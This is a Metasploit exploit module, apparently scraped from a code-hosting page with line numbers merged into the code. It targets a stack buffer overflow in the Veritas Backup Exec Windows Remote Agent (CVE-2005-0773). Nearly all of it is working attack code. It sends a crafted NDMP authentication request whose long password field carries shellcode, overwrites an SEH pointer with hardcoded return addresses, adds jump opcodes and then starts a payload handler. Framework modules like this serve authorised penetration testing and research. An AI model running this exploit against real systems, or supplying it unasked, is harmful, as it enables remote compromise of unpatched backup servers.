Path: blob/master/modules/exploits/windows/backupexec/remote_agent.rb
31923 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::NDMP910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the Veritas17BackupExec Windows Agent software. This vulnerability occurs18when a client authentication request is received with type19'3' and a long password argument. Reliable execution is20obtained by abusing the stack buffer overflow to smash a SEH21pointer.22},23'Author' => [ 'hdm' ],24'License' => MSF_LICENSE,25'References' => [26[ 'CVE', '2005-0773'],27[ 'OSVDB', '17624'],28[ 'BID', '14022'],29[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']30],31'Privileged' => true,32'DefaultOptions' => {33'EXITFUNC' => 'process'34},35'Payload' => {36'Space' => 1024,37'BadChars' => "\x00",38'StackAdjustment' => -350039},40'Targets' => [41[42'Veritas BE 9.0/9.1/10.0 (All Windows)',43{44'Platform' => 'win',45'Rets' => [ 0x0140f8d5, 0x014261b0 ]46},47],48[49'Veritas BE 9.0/9.1/10.0 (Windows 2000)',50{51'Platform' => 'win',52'Rets' => [ 0x75022ac4, 0x75022ac4 ]53},54],55],56'DefaultTarget' => 0,57'DisclosureDate' => '2005-06-22',58'Notes' => {59'Reliability' => UNKNOWN_RELIABILITY,60'Stability' => UNKNOWN_STABILITY,61'SideEffects' => UNKNOWN_SIDE_EFFECTS62}63)64)6566register_options(67[68Opt::RPORT(10000)69]70)71end7273def check74info = ndmp_info75if (info and info['Version'])76vprint_status(" Vendor: #{info['Vendor']}")77vprint_status("Product: #{info['Product']}")78vprint_status("Version: #{info['Version']}")7980if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)81return Exploit::CheckCode::Appears82end83end84return Exploit::CheckCode::Safe85end8687def exploit88connect8990print_status("Trying target #{target.name}...")9192ndmp_recv9394username = 'X' * 51295password = rand_text_alphanumeric(8192)9697# Place our payload early in the request and jump backwards into it98password[3536 - payload.encoded.length, payload.encoded.length] = payload.encoded99100# This offset is required for version 10.0101password[3536, 2] = "\xeb\x06"102password[3540, 4] = [ target['Rets'][1] ].pack('V')103password[3544, 5] = "\xe9" + [-1037].pack('V')104105# This offset is required for version 9.0/9.1106password[4524, 2] = "\xeb\x06"107password[4528, 4] = [ target['Rets'][0] ].pack('V')108password[4532, 5] = "\xe9" + [-2025].pack('V')109110# Create the authentication request111auth = [1121, # Sequence number113Time.now.to_i, # Current time1140, # Message type (request)1150x901, # Message name (connect_client_auth)1160, # Reply sequence number1170, # Error status1183 # Authentication type119].pack('NNNNNNN') +120[ username.length ].pack('N') + username +121[ password.length ].pack('N') + password +122[ 4 ].pack('N')123124print_status('Sending authentication request...')125ndmp_send(auth)126127# Attempt to read a reply (this should fail)128ndmp_recv129130handler131disconnect132end133end134135136